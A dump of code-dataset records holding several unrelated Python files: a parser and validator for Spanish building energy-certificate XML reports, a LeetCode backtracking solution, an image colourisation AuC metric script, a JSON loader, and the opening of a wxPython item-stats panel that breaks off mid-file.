bb.NumeroDePlantasSobreRasante = astext(et, './DatosGeneralesyGeometria/NumeroDePlantasSobreRasante')\n img = self.xmltree.find('./DatosGeneralesyGeometria/Imagen')\n bb.Imagen = base64check(img.text) if (img is not None and img.text) else None\n img = self.xmltree.find('./DatosGeneralesyGeometria/Plano')\n bb.Plano = base64check(img.text) if (img is not None and img.text) else None\n for attr in ['NumeroDePlantasBajoRasante',\n 'PorcentajeSuperficieHabitableCalefactada',\n 'PorcentajeSuperficieHabitableRefrigerada']:\n setattr(bb, attr, asint(et, './DatosGeneralesyGeometria/%s' % attr))\n for attr in ['SuperficieHabitable',\n 'VolumenEspacioHabitable',\n 'Compacidad',\n 'PorcentajeSuperficieAcristalada',\n 'DensidadFuentesInternas',\n 'VentilacionUsoResidencial',\n 'VentilacionTotal',\n 'DemandaDiariaACS']:\n setattr(bb, attr, asfloat(et, './DatosGeneralesyGeometria/%s' % attr))\n bb.PorcentajeSuperficieAcristalada = Bunch(\n **{key:asint(et, './DatosGeneralesyGeometria/PorcentajeSuperficieAcristalada/%s' % key)\n for key in 'N NE E SE S SO O NO'.split()})\n #print bb\n\n ## Datos Envolvente Térmica\n bb = Bunch()\n data.DatosEnvolventeTermica = bb\n bb.CerramientosOpacos = []\n elementosopacos = self.xmltree.find('./DatosEnvolventeTermica/CerramientosOpacos')\n elementosopacos = [] if elementosopacos is None else elementosopacos\n for elemento in elementosopacos:\n obj = Bunch()\n for attr in ['Nombre', 'Tipo', 'Orientacion', 'ModoDeObtencion']:\n setattr(obj, attr, astext(elemento, './%s' % attr))\n for attr in ['Superficie', 'Transmitancia']:\n setattr(obj, attr, asfloat(elemento, './%s' % attr))\n obj.Capas = []\n for ecapa in elemento.find('./Capas'):\n capa = Bunch()\n capa.Material = astext(ecapa, './Material')\n for attr in ['Espesor',\n 'ConductividadTermica', 'ResistenciaTermica',\n 'Densidad', 'FactorResistenciaVapor',\n 'CalorEspecifico']:\n setattr(capa, attr, asfloat(ecapa, './%s' % attr))\n obj.Capas.append(capa)\n bb.CerramientosOpacos.append(obj)\n\n bb.HuecosyLucernarios = []\n elementoshuecos = self.xmltree.find('./DatosEnvolventeTermica/HuecosyLucernarios')\n elementoshuecos = [] if elementoshuecos is None else elementoshuecos\n for elemento in elementoshuecos:\n obj = Bunch()\n for attr in ['Nombre', 'Tipo', 'Orientacion',\n 'ModoDeObtencionTransmitancia',\n 'ModoDeObtencionFactorSolar']:\n setattr(obj, attr, astext(elemento, './%s' % attr))\n for attr in ['Superficie', 'Transmitancia', 'FactorSolar']:\n setattr(obj, attr, asfloat(elemento, './%s' % attr))\n bb.HuecosyLucernarios.append(obj)\n\n bb.PuentesTermicos = []\n elementospts = self.xmltree.find('./DatosEnvolventeTermica/PuentesTermicos')\n elementospts = [] if elementospts is None else elementospts\n for elemento in elementospts:\n obj = Bunch()\n for attr in ['Nombre', 'Tipo', 'ModoDeObtencion']:\n setattr(obj, attr, astext(elemento, './%s' % attr))\n for attr in ['Longitud', 'Transmitancia']:\n setattr(obj, attr, asfloat(elemento, './%s' % attr))\n bb.PuentesTermicos.append(obj)\n #print bb\n\n ## Instalaciones Térmicas\n bb = Bunch()\n data.InstalacionesTermicas = bb\n bb.GeneradoresDeCalefaccion = []\n elementosgeneradores = self.xmltree.find('./InstalacionesTermicas/GeneradoresDeCalefaccion')\n elementosgeneradores = [] if elementosgeneradores is None else elementosgeneradores\n for elemento in elementosgeneradores:\n obj = Bunch()\n for attr in ['Nombre', 'Tipo', 'VectorEnergetico',\n 'ModoDeObtencion']:\n setattr(obj, attr, astext(elemento, './%s' % attr))\n for attr in ['PotenciaNominal', 'RendimientoNominal', 'RendimientoEstacional']:\n setattr(obj, attr, asfloat(elemento, './%s' % attr))\n bb.GeneradoresDeCalefaccion.append(obj)\n bb.totalpotenciageneradoresdecalefaccion = sum(e.PotenciaNominal for e in bb.GeneradoresDeCalefaccion if e.PotenciaNominal <= ALERT)\n \n bb.GeneradoresDeRefrigeracion = []\n elementosgeneradores = self.xmltree.find('./InstalacionesTermicas/GeneradoresDeRefrigeracion')\n elementosgeneradores = [] if elementosgeneradores is None else elementosgeneradores\n for elemento in elementosgeneradores:\n obj = Bunch()\n for attr in ['Nombre', 'Tipo', 'VectorEnergetico',\n 'ModoDeObtencion']:\n setattr(obj, attr, astext(elemento, './%s' % attr))\n for attr in ['PotenciaNominal', 'RendimientoNominal', 'RendimientoEstacional']:\n setattr(obj, attr, asfloat(elemento, './%s' % attr))\n bb.GeneradoresDeRefrigeracion.append(obj)\n bb.totalpotenciageneradoresderefrigeracion = sum(e.PotenciaNominal for e in bb.GeneradoresDeRefrigeracion if e.PotenciaNominal <= ALERT)\n \n bb.InstalacionesACS = []\n elementosgeneradores = self.xmltree.find('./InstalacionesTermicas/InstalacionesACS')\n elementosgeneradores = [] if elementosgeneradores is None else elementosgeneradores\n for elemento in elementosgeneradores:\n obj = Bunch()\n for attr in ['Nombre', 'Tipo', 'VectorEnergetico',\n 'ModoDeObtencion']:\n setattr(obj, attr, astext(elemento, './%s' % attr))\n for attr in ['PotenciaNominal', 'RendimientoNominal', 'RendimientoEstacional']:\n setattr(obj, attr, asfloat(elemento, './%s' % attr))\n bb.InstalacionesACS.append(obj)\n\n bb.SistemasSecundariosCalefaccionRefrigeracion = []\n elementossecundarios = self.xmltree.find('./InstalacionesTermicas/SistemasSecundariosCalefaccionRefrigeracion')\n elementossecundarios = [] if elementossecundarios is None else elementossecundarios\n for elemento in elementossecundarios:\n obj = Bunch()\n for attr in ['Nombre', 'Tipo', 'ZonaAsociada',\n 'EnfriamientoEvaporativo', 'RecuperacionEnergia',\n 'EnfriamentoGratuito', 'TipoControl']:\n setattr(obj, attr, astext(elemento, './%s' % attr))\n for attr in ['PotenciaCalor', 'PotenciaFrio', 'RendimentoCalor', 'RendimientoFrio',\n 'RendimientoEstacionalCalor', 'RendimientoEstacionalFrio']:\n setattr(obj, attr, asfloat(elemento, './%s' % attr))\n bb.SistemasSecundariosCalefaccionRefrigeracion.append(obj)\n\n bb.TorresyRefrigeracion = []\n elementostorres = self.xmltree.find('./InstalacionesTermicas/TorresyRefrigeracion')\n elementostorres = [] if elementostorres is None else elementostorres\n for elemento in elementostorres:\n obj = Bunch()\n for attr in ['Nombre', 'Tipo', 'ServicioAsociado']:\n setattr(obj, attr, astext(elemento, './%s' % attr))\n for attr in ['ConsumoDeEnergia']:\n setattr(obj, attr, asfloat(elemento, './%s' % attr))\n bb.TorresyRefrigeracion.append(obj)\n bb.totalconsumotorresyrefrigeracion = sum(e.ConsumoDeEnergia for e in bb.TorresyRefrigeracion)\n \n bb.VentilacionyBombeo = []\n elementosventila = self.xmltree.find('./InstalacionesTermicas/VentilacionyBombeo')\n elementosventila = [] if elementosventila is None else elementosventila\n for elemento in elementosventila:\n obj = Bunch()\n for attr in ['Nombre', 'Tipo', 'ServicioAsociado']:\n setattr(obj, attr, astext(elemento, './%s' % attr))\n for attr in ['ConsumoDeEnergia']:\n setattr(obj, attr, asfloat(elemento, './%s' % attr))\n bb.VentilacionyBombeo.append(obj)\n bb.totalconsumoventilacionybombeo = sum(e.ConsumoDeEnergia for e in bb.VentilacionyBombeo)\n #print bb\n\n ## Condiciones de funcionamiento y ocupación\n bb = []\n data.CondicionesFuncionamientoyOcupacion = bb\n elementoscond = self.xmltree.find('./CondicionesFuncionamientoyOcupacion')\n elementoscond = [] if elementoscond is None else elementoscond\n for elemento in elementoscond:\n obj = Bunch()\n for attr in ['Nombre', 'NivelDeAcondicionamiento', 'PerfilDeUso']:\n setattr(obj, attr, astext(elemento, './%s' % attr))\n for attr in ['Superficie']:\n setattr(obj, attr, asfloat(elemento, './%s' % attr))\n bb.append(obj)\n #print self.CondicionesFuncionamientoyOcupacion\n\n # Superficies de los espacios\n data.superficies = dict((e.Nombre, e.Superficie) for e in data.CondicionesFuncionamientoyOcupacion)\n\n ## Instalaciones de iluminación\n bb = Bunch()\n data.InstalacionesIluminacion = bb\n bb.PotenciaTotalInstalada = asfloat(self.xmltree, './InstalacionesIluminacion/PotenciaTotalInstalada')\n bb.Espacios = []\n elementosilumina = self.xmltree.find('./InstalacionesIluminacion')\n elementosilumina = [] if elementosilumina is None else elementosilumina\n for elemento in elementosilumina:\n if elemento.tag == 'PotenciaTotalInstalada': continue\n obj = Bunch()\n for attr in ['Nombre', 'ModoDeObtencion']:\n setattr(obj, attr, astext(elemento, './%s' % attr))\n for attr in ['PotenciaInstalada', 'VEEI', 'IluminanciaMedia']:\n setattr(obj, attr, asfloat(elemento, './%s' % attr))\n bb.Espacios.append(obj)\n _eiluminados = dict((e.Nombre, e) for e in bb.Espacios)\n _supiluminada = sum(data.superficies[e] for e in _eiluminados)\n bb.totalpotenciamedia = sum(1.0*data.superficies[e]*_eiluminados[e].PotenciaInstalada / _supiluminada for e in _eiluminados)\n #print bb\n\n ## Energías renovables\n bb = Bunch()\n data.EnergiasRenovables = bb\n bb.Termica = []\n elementosertermica = self.xmltree.find('./EnergiasRenovables/Termica')\n elementosertermica = [] if elementosertermica is None else elementosertermica\n for elemento in elementosertermica:\n obj = Bunch()\n for attr in ['Nombre']:\n setattr(obj, attr, astext(elemento, './%s' % attr))\n for attr in ['ConsumoFinalCalefaccion', 'ConsumoFinalRefrigeracion',\n 'ConsumoFinalACS', 'DemandaACS']:\n setattr(obj, attr, asfloat(elemento, './%s' % attr))\n bb.Termica.append(obj)\n\n bb.totaltermica = Bunch()\n _noneaszero = lambda x: x if x is not None else 0\n bb.totaltermica.ConsumoFinalCalefaccion = sum(_noneaszero(getattr(e, 'ConsumoFinalCalefaccion', 0)) for e in bb.Termica)\n bb.totaltermica.ConsumoFinalRefrigeracion = sum(_noneaszero(getattr(e, 'ConsumoFinalRefrigeracion', 0)) for e in bb.Termica)\n bb.totaltermica.ConsumoFinalACS = sum(_noneaszero(getattr(e, 'ConsumoFinalACS', 0)) for e in bb.Termica)\n bb.totaltermica.DemandaACS = sum(_noneaszero(getattr(e, 'DemandaACS', 0)) for e in bb.Termica)\n\n bb.Electrica = []\n elementoserelectrica = self.xmltree.find('./EnergiasRenovables/Electrica')\n elementoserelectrica = [] if elementoserelectrica is None else elementoserelectrica\n for elemento in elementoserelectrica:\n obj = Bunch()\n for attr in ['Nombre']:\n setattr(obj, attr, astext(elemento, './%s' % attr))\n for attr in ['EnergiaGeneradaAutoconsumida']:\n setattr(obj, attr, asfloat(elemento, './%s' % attr))\n bb.Electrica.append(obj)\n bb.totalelectrica = sum(e.EnergiaGeneradaAutoconsumida for e in bb.Electrica)\n #print bb\n\n ## Demanda\n bb = Bunch()\n data.Demanda = bb\n bb.EdificioObjeto = Bunch()\n for attr in ['Global', 'Calefaccion', 'Refrigeracion', 'ACS',\n 'Conjunta', 'Calefaccion08', 'Refrigeracion08',\n 'Conjunta08', 'Ahorro08']:\n setattr(bb.EdificioObjeto, attr,\n asfloat(self.xmltree, './Demanda/EdificioObjeto/%s' % attr))\n\n bb.EdificioDeReferencia = Bunch()\n for attr in ['Global', 'Calefaccion', 'Refrigeracion', 'ACS',\n 'Conjunta', 'Calefaccion08', 'Refrigeracion08',\n 'Conjunta08']:\n setattr(bb.EdificioDeReferencia, attr,\n asfloat(self.xmltree, './Demanda/EdificioDeReferencia/%s' % attr))\n\n bb.Exigencias = Bunch()\n for attr in ['LimiteCalefaccionVivienda', 'LimiteRefrigeracionVivienda',\n 'LimiteAhorroOtrosUsos']:\n setattr(bb.Exigencias, attr,\n asfloat(self.xmltree, './Demanda/Exigencias/%s' % attr))\n #print bb\n\n ## Consumo\n bb = Bunch()\n data.Consumo = bb\n bb.FactoresdePaso = Bunch()\n\n cc = Bunch()\n for attr in VECTORES:\n setattr(cc, attr, asfloat(self.xmltree, './Consumo/FactoresdePaso/FinalAPrimariaNoRenovable/%s' % attr))\n bb.FactoresdePaso.FinalAPrimariaNoRenovable = cc\n\n cc = Bunch()\n for attr in VECTORES:\n setattr(cc, attr, asfloat(self.xmltree, './Consumo/FactoresdePaso/FinalAEmisiones/%s' % attr))\n bb.FactoresdePaso.FinalAEmisiones = cc\n\n cc = Bunch()\n for vec in VECTORES:\n vv = Bunch()\n if self.xmltree.find('./Consumo/EnergiaFinalVectores/%s' % vec) is not None:\n for servicio in SERVICIOS:\n setattr(vv, servicio, asfloat(self.xmltree, './Consumo/EnergiaFinalVectores/%s/%s' % (vec, servicio)))\n setattr(cc, vec, vv)\n bb.EnergiaFinalVectores = cc\n\n # Datos de energía final por servicios\n cc = Bunch()\n bb.EnergiaFinal = cc\n for vector in VECTORES:\n vecdata = getattr(bb.EnergiaFinalVectores, vector, None)\n if vecdata is None: continue\n for servicio in SERVICIOS:\n veccval = getattr(vecdata, servicio, 0.0)\n if veccval is None: continue\n cval = getattr(cc, servicio, 0.0)\n cval = 0.0 if cval is None else cval\n setattr(cc, servicio, cval + veccval)\n\n cc = Bunch()\n for servicio in SERVICIOS:\n setattr(cc, servicio, asfloat(self.xmltree, './Consumo/EnergiaPrimariaNoRenovable/%s' % servicio))\n bb.EnergiaPrimariaNoRenovable = cc\n\n bb.Exigencias = Bunch()\n bb.Exigencias.LimiteViviendaGlobalEPNR = asfloat(self.xmltree, './Consumo/Exigencias/LimiteViviendaGlobalEPNR')\n #print bb\n\n ## Emisiones de CO2\n bb = Bunch()\n data.EmisionesCO2 = bb\n for servicio in SERVICIOS + 'ConsumoElectrico ConsumoOtros TotalConsumoElectrico TotalConsumoOtros'.split():\n setattr(bb, servicio, asfloat(self.xmltree, './EmisionesCO2/%s' % servicio))\n #print bb\n\n ## Calificacion\n bb = Bunch()\n data.Calificacion = bb\n\n cc = Bunch()\n bb.Demanda = cc\n escala = self.xmltree.find('./Calificacion/Demanda/EscalaCalefaccion')\n if escala is not None:\n dd = Bunch()\n for nivel in NIVELESESCALA:\n setattr(dd, nivel, asfloat(escala, './%s' % nivel))\n cc.EscalaCalefaccion = dd\n escala = self.xmltree.find('./Calificacion/Demanda/EscalaRefrigeracion')\n if escala is not None:\n dd = Bunch()\n for nivel in NIVELESESCALA:\n setattr(dd, nivel, asfloat(escala, './%s' % nivel))\n cc.EscalaRefrigeracion = dd\n cc.Calefaccion = astext(self.xmltree, './Calificacion/Demanda/Calefaccion')\n cc.Refrigeracion = astext(self.xmltree, './Calificacion/Demanda/Calefaccion')\n\n cc = Bunch()\n bb.EnergiaPrimariaNoRenovable = cc\n escala = self.xmltree.find('./Calificacion/EnergiaPrimariaNoRenovable/EscalaGlobal')\n if escala is not None:\n dd = Bunch()\n for nivel in NIVELESESCALA:\n setattr(dd, nivel, asfloat(escala, './%s' % nivel))\n cc.EscalaGlobal = dd\n cc.Global = astext(self.xmltree, './Calificacion/EnergiaPrimariaNoRenovable/Global')\n cc.Calefaccion = astext(self.xmltree, './Calificacion/EnergiaPrimariaNoRenovable/Calefaccion')\n cc.Refrigeracion = astext(self.xmltree, './Calificacion/EnergiaPrimariaNoRenovable/Refrigeracion')\n cc.ACS = astext(self.xmltree, './Calificacion/EnergiaPrimariaNoRenovable/ACS')\n cc.Iluminacion = astext(self.xmltree, './Calificacion/EnergiaPrimariaNoRenovable/Iluminacion')\n\n cc = Bunch()\n bb.EmisionesCO2 = cc\n escala = self.xmltree.find('./Calificacion/EmisionesCO2/EscalaGlobal')\n if escala is not None:\n dd = Bunch()\n for nivel in NIVELESESCALA:\n setattr(dd, nivel, asfloat(escala, './%s' % nivel))\n cc.EscalaGlobal = dd\n cc.Global = astext(self.xmltree, './Calificacion/EmisionesCO2/Global')\n cc.Calefaccion = astext(self.xmltree, './Calificacion/EmisionesCO2/Calefaccion')\n cc.Refrigeracion = astext(self.xmltree, './Calificacion/EmisionesCO2/Refrigeracion')\n cc.ACS = astext(self.xmltree, './Calificacion/EmisionesCO2/ACS')\n cc.Iluminacion = astext(self.xmltree, './Calificacion/EmisionesCO2/Iluminacion')\n #print bb\n\n ## Medidas de mejora\n data.MedidasDeMejora = []\n medidas = self.xmltree.find('./MedidasDeMejora')\n medidas = [] if medidas is None else medidas\n for medida in medidas:\n bb = Bunch()\n for attr in 'Nombre Descripcion CosteEstimado OtrosDatos'.split():\n txt = astext(medida, './%s' % attr)\n if txt and txt.startswith('data:/text/html,'):\n txt = txt.lstrip('data:/text/html,')\n txt = clean_html(txt)\n setattr(bb, attr, txt)\n cc = Bunch()\n bb.Demanda = cc\n for attr in 'Global GlobalDiferenciaSituacionInicial Calefaccion Refrigeracion'.split():\n setattr(cc, attr, asfloat(medida, './Demanda/%s' % attr))\n cc = Bunch()\n bb.CalificacionDemanda = cc\n for attr in 'Calefaccion Refrigeracion'.split():\n setattr(cc, attr, astext(medida, './CalificacionDemanda/%s' % attr))\n cc = Bunch()\n bb.EnergiaFinal = cc\n for attr in SERVICIOS:\n setattr(cc, attr, asfloat(medida, './EnergiaFinal/%s' % attr))\n cc = Bunch()\n bb.EnergiaPrimariaNoRenovable = cc\n for attr in SERVICIOS:\n setattr(cc, attr, asfloat(medida, './EnergiaPrimariaNoRenovable/%s' % attr))\n cc.GlobalDiferenciaSituacionInicial = asfloat(medida, './EnergiaPrimariaNoRenovable/GlobalDiferenciaSituacionInicial')\n cc = Bunch()\n bb.CalificacionEnergiaPrimariaNoRenovable = cc\n for attr in SERVICIOS:\n setattr(cc, attr, astext(medida, './CalificacionEnergiaPrimariaNoRenovable/%s' % attr))\n cc = Bunch()\n bb.EmisionesCO2 = cc\n for attr in SERVICIOS:\n setattr(cc, attr, asfloat(medida, './EmisionesCO2/%s' % attr))\n cc.GlobalDiferenciaSituacionInicial = asfloat(medida, './EmisionesCO2/GlobalDiferenciaSituacionInicial')\n cc = Bunch()\n bb.CalificacionEmisionesCO2 = cc\n for attr in SERVICIOS:\n setattr(cc, attr, astext(medida, './CalificacionEmisionesCO2/%s' % attr))\n data.MedidasDeMejora.append(bb)\n #print bb\n\n ## Pruebas, comprobaciones e inspecciones\n data.PruebasComprobacionesInspecciones = []\n pruebas = self.xmltree.find('./PruebasComprobacionesInspecciones')\n pruebas = [] if pruebas is None else pruebas\n for prueba in pruebas:\n bb = Bunch()\n bb.FechaVisita = astext(prueba, './FechaVisita')\n txt = astext(prueba, './Datos')\n if txt and txt.startswith('data:/text/html,'):\n txt = txt.lstrip('data:/text/html,')\n txt = clean_html(txt)\n bb.Datos = txt\n data.PruebasComprobacionesInspecciones.append(bb)\n #print bb\n\n ## Datos personalizados\n txt = astext(self.xmltree, './DatosPersonalizados')\n if txt and txt.startswith('data:/text/html,'):\n txt = txt.lstrip('data:/text/html,')\n txt = clean_html(txt)\n data.DatosPersonalizados = txt\n #print data.DatosPersonalizados\n\n return data\n\n def validate(self):\n \"\"\"Valida el informe XML según el esquema XSD\"\"\"\n # http://lxml.de/validation.html\n if self.version == '1':\n self.xmlschema = lxml.etree.XMLSchema(lxml.etree.parse(open(XSDPATH1)))\n else:\n self.xmlschema = lxml.etree.XMLSchema(lxml.etree.parse(open(XSDPATH2)))\n self.xmlschema.validate(self.xmltree)\n errors = [(error.line, error.message.encode(\"utf-8\"))\n for error in self.xmlschema.error_log]\n return errors\n\ndef analize(informe):\n \"\"\"Analiza contenidos de un Informe XML en busca de posibles errores\"\"\"\n dd = informe.data\n ddid = dd.IdentificacionEdificio\n ddgeo = dd.DatosGeneralesyGeometria\n zci = ddid.ZonaClimatica[:-1]\n zcv = ddid.ZonaClimatica[-1]\n esvivienda = 'Vivienda' in ddid.TipoDeEdificio\n\n info = []\n if ddid.AnoConstruccion == '-':\n info.append(('AVISO', u'No se ha definido el año de construcción'))\n if ddid.ReferenciaCatastral == '-':\n info.append(('AVISO', u'No se ha definido la referencia catastral'))\n\n if sum(dd.superficies.values()) > ddgeo.SuperficieHabitable:\n info.append(('ERROR', u'Superficies habitable menor que suma de la superficie de los espacios'))\n if zcv not in '1234':\n info.append(('ERROR', u'Zona climática de verano incorrecta'))\n if zci not in ['A', 'B', 'C', 'D', 'E', 'alfa', 'alpha']:\n info.append(('ERROR', u'Zona climática de invierno incorrecta'))\n\n plano_ = ddgeo.Plano\n if not plano_:\n info.append(('AVISO', u'Sin datos de plano'))\n elif not base64check(plano_):\n info.append(('AVISO', u'Datos de plano incorrectos'))\n\n imagen_ = ddgeo.Imagen\n if not imagen_:\n info.append(('AVISO', u'Sin datos de imagen'))\n elif not base64check(imagen_):\n info.append(('AVISO', u'Datos de imagen incorrectos'))\n\n if ((0 > ddgeo.PorcentajeSuperficieHabitableCalefactada > 100)\n or (0 > ddgeo.PorcentajeSuperficieHabitableRefrigerada > 100)):\n info.append(('ERROR', u'Porcentajes de superficies acondicionadas fuera de rango'))\n\n if esvivienda:\n # Sin chequear\n if (zcv == '1'\n and (dd.Demanda.EdificioDeReferencia.Refrigeracion\n or dd.Calificacion.EmisionesCO2.Refrigeracion\n or dd.Calificacion.Demanda.Refrigeracion\n or dd.Calificacion.EnergiaPrimariaNoRenovable.Refrigeracion)):\n info.append(('ERROR', u'Zona sin demanda de refrigeración de referencia y para el que se ha definido calificación para ese servicio'))\n # Sin chequear\n if (zci in ('alpha', 'alfa', 'a')\n and (dd.Demanda.EdificioDeReferencia.Calefaccion\n or dd.Calificacion.EmisionesCO2.Calefaccion\n or dd.Calificacion.Demanda.Calefaccion\n or dd.Calificacion.EnergiaPrimariaNoRenovable.Calefaccion)):\n info.append(('ERROR', u'Zona sin demanda de calefacción de referencia y para la que se ha definido calificación para ese servicio'))\n\n if not esvivienda:\n if not informe.data.InstalacionesTermicas.SistemasSecundariosCalefaccionRefrigeracion:\n info.append(('AVISO', u'No se han definido sistemas secundarios de calefacción y/o refrigeración'))\n if not informe.data.InstalacionesTermicas.VentilacionyBombeo:\n info.append(('AVISO', u'No se han definido sistemas de ventilación y bombeo'))\n\n def _visit(res, ckey, obj):\n \"Incluye en res la lista de valores numéricos con sus etiquetas\"\n if isinstance(obj, numbers.Number):\n res.append((obj, ckey))\n elif isinstance(obj, (list, tuple)):\n for item in obj:\n _visit(res, ckey, item)\n elif isinstance(obj, (Bunch,)):\n for key in obj.keys():\n if key.startswith('_'): continue\n _visit(res, key, obj[key])\n\n values = []\n _visit(values, 'root', informe.data)\n suspects = [key for (value, key) in values if value >= ALERT]\n if suspects:\n info.append(('AVISO', u'Valores numéricos erróneos en : %s' % ', '.join(set(suspects))))\n\n return info\n\n","repo_name":"pachi/visorxml_flask","sub_path":"visorxml/informes.py","file_name":"informes.py","file_ext":"py","file_size_in_byte":31364,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34076714778","text":"class Solution:\n def movingCount(self, m: int, n: int, k: int) -> int:\n def isValid(x: int, y: int):\n bit_sum = 0\n while x != 0:\n bit_sum += x % 10\n x = int(x / 10)\n while y != 0:\n bit_sum += y % 10\n y = int(y / 10)\n return bit_sum <= k\n\n def infect(x: int, y: int):\n # 回朔出口\n # 超出边界\n if x < 0 or x > m - 1 or y < 0 or y > n - 1: return 0\n # 超出k约定距离\n if not isValid(x, y) or (x, y) in footprint: return 0\n # 记录当前信息\n footprint.add((x, y))\n return infect(x + 1, y) + infect(x, y - 1) + infect(x - 1, y) + infect(x, y + 1) + 1\n footprint = set() # 我们在回朔的时候,不但要知道怎么走出去,还要记录足迹,为的是防止重复。\n\n return infect(0, 0)\n\n\nfoo = Solution()\nprint(foo.movingCount(2, 3, 1))\n","repo_name":"Allen-C-Guan/Leetcode-Answer","sub_path":"python_part/Leetcode/Traverse/backtracking and DFS/面试13/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3528203305","text":"import sys\nimport numpy as np\nimport skimage\n\nimport argparse\nimport os\n\n\nimport skimage.io as io\nimport skimage.color as color\n\n\ndef main(ref_dir, gen_dir):\n \"\"\"\n Compute the mean and standard deviation of the AuC metric from an image directory\n \n Args:\n ref_dir: reference images directory\n gen_dir: generated images directory\n \"\"\"\n MAX_THRESHOLD = 150\n\n files = os.listdir(ref_dir)\n\n auc_list = np.empty(len(files))\n\n for i, file in enumerate(files):\n if(os.path.exists(os.path.join(gen_dir,file))):\n \n # Load images\n img0 = io.imread(os.path.join(ref_dir,file))\n img1 = io.imread(os.path.join(gen_dir,file))\n \n n_pixels = img0.shape[0]*img1.shape[1]\n \n # Convert the image to the AB color space\n img0_lab = color.rgb2lab(img0)\n img1_lab = color.rgb2lab(img1)\n img0_lab[:,:,0] = 0\n img1_lab[:,:,0] = 0\n \n dist = color.deltaE_cie76(img0_lab,img1_lab)\n \n auc = 0.0\n \n # Compute the cumulative mass function of the distance function over the 0-150 range\n for threshold in range(0,MAX_THRESHOLD):\n pix_under_curve = len(dist[dist<=threshold])\n auc += pix_under_curve/n_pixels\n auc /= MAX_THRESHOLD\n auc_list[i] = auc\n \n print('%s: %.4f'%(file,auc))\n \n print(\"Auc mean: {:.4f}\".format(auc_list.mean()))\n print(\"Auc std: {:.4f}\".format(auc_list.std()))\n \nif __name__=='__main__':\n\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('-d0','--dir0', type=str, required=True, help='reference images directory')\n parser.add_argument('-d1','--dir1', type=str, required=True, help='generated images directory')\n \n opt = parser.parse_args()\n main(opt.dir0, opt.dir1)","repo_name":"majedelhelou/BIGPrior","sub_path":"code/auc.py","file_name":"auc.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"72"} +{"seq_id":"28995041247","text":"#!/usr/bin/python3\n'''\nWrite a function that creates an\nObject from a “JSON file”\n'''\n\nimport json\n\n\ndef load_from_json_file(filename):\n '''\n Create object from JSON file\n '''\n if filename is None:\n return\n with open(filename, 'r', encoding='utf-8') as f:\n json_var = json.load(f)\n return json_var\n","repo_name":"Gzoref/holbertonschool-higher_level_programming","sub_path":"0x0B-python-input_output/8-load_from_json_file.py","file_name":"8-load_from_json_file.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"28120836800","text":"import sys\r\nimport csv\r\nimport config\r\n\r\n# noinspection PyPackageRequirements\r\nimport wx\r\n\r\nfrom helpers import AutoListCtrl\r\n\r\nfrom gui.bitmapLoader import BitmapLoader\r\nfrom service.market import Market\r\nfrom service.attribute import Attribute\r\nfrom gui.utils.numberFormatter import formatAmount\r\n\r\n\r\nclass ItemParams(wx.Panel):\r\n def __init__(self, parent, stuff, item, context=None):\r\n wx.Panel.__init__(self, parent)\r\n mainSizer = wx.BoxSizer(wx.VERTICAL)\r\n\r\n self.paramList = AutoListCtrl(self, wx.ID_ANY,\r\n style=wx.LC_REPORT | wx.LC_SINGLE_SEL | wx.LC_VRULES | wx.NO_BORDER)\r\n mainSizer.Add(self.paramList, 1, wx.ALL | wx.EXPAND, 0)\r\n self.SetSizer(mainSizer)\r\n\r\n self.toggleView = 1\r\n self.stuff = stuff\r\n self.item = item\r\n self.attrInfo = {}\r\n self.attrValues = {}\r\n self._fetchValues()\r\n\r\n self.m_staticline = wx.StaticLine(self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.LI_HORIZONTAL)\r\n mainSizer.Add(self.m_staticline, 0, wx.EXPAND)\r\n bSizer = wx.BoxSizer(wx.HORIZONTAL)\r\n\r\n self.totalAttrsLabel = wx.StaticText(self, wx.ID_ANY, u\" \", wx.DefaultPosition, wx.DefaultSize, 0)\r\n bSizer.Add(self.totalAttrsLabel, 0, wx.ALIGN_CENTER_VERTICAL | wx.RIGHT)\r\n\r\n self.toggleViewBtn = wx.ToggleButton(self, wx.ID_ANY, u\"Toggle view mode\", wx.DefaultPosition, wx.DefaultSize,\r\n 0)\r\n bSizer.Add(self.toggleViewBtn, 0, wx.ALIGN_CENTER_VERTICAL)\r\n\r\n self.exportStatsBtn = wx.ToggleButton(self, wx.ID_ANY, u\"Export Item Stats\", wx.DefaultPosition, wx.DefaultSize,\r\n 0)\r\n bSizer.Add(self.exportStatsBtn, 0, wx.ALIGN_CENTER_VERTICAL)\r\n\r\n if stuff is not None:\r\n self.refreshBtn = wx.Button(self, wx.ID_ANY, u\"Refresh\", wx.DefaultPosition, wx.DefaultSize, wx.BU_EXACTFIT)\r\n bSizer.Add(self.refreshBtn, 0, wx.ALIGN_CENTER_VERTICAL)\r\n self.refreshBtn.Bind(wx.EVT_BUTTON, self.RefreshValues)\r\n\r\n mainSizer.Add(bSizer, 0, wx.ALIGN_RIGHT)\r\n\r\n self.PopulateList()\r\n\r\n self.toggleViewBtn.Bind(wx.EVT_TOGGLEBUTTON, self.ToggleViewMode)\r\n self.exportStatsBtn.Bind(wx.EVT_TOGGLEBUTTON, self.ExportItemStats)\r\n\r\n def _fetchValues(self):\r\n if self.stuff is None:\r\n self.attrInfo.clear()\r\n self.attrValues.clear()\r\n self.attrInfo.update(self.item.attributes)\r\n self.attrValues.update(self.item.attributes)\r\n elif self.stuff.item == self.item:\r\n self.attrInfo.clear()\r\n self.attrValues.clear()\r\n self.attrInfo.update(self.stuff.item.attributes)\r\n self.attrValues.update(self.stuff.itemModifiedAttributes)\r\n elif self.stuff.charge == self.item:\r\n self.attrInfo.clear()\r\n self.attrValues.clear()\r\n self.attrInfo.update(self.stuff.charge.attributes)\r\n self.attrValues.update(self.stuff.chargeModifiedAttributes)\r\n # When item for stats window no longer exists, don't change anything\r\n else:\r\n return\r\n\r\n def UpdateList(self):\r\n self.Freeze()\r\n self.paramList.ClearAll()\r\n self.PopulateList()\r\n self.Thaw()\r\n self.paramList.resizeLastColumn(100)\r\n\r\n def RefreshValues(self, event):\r\n self._fetchValues()\r\n 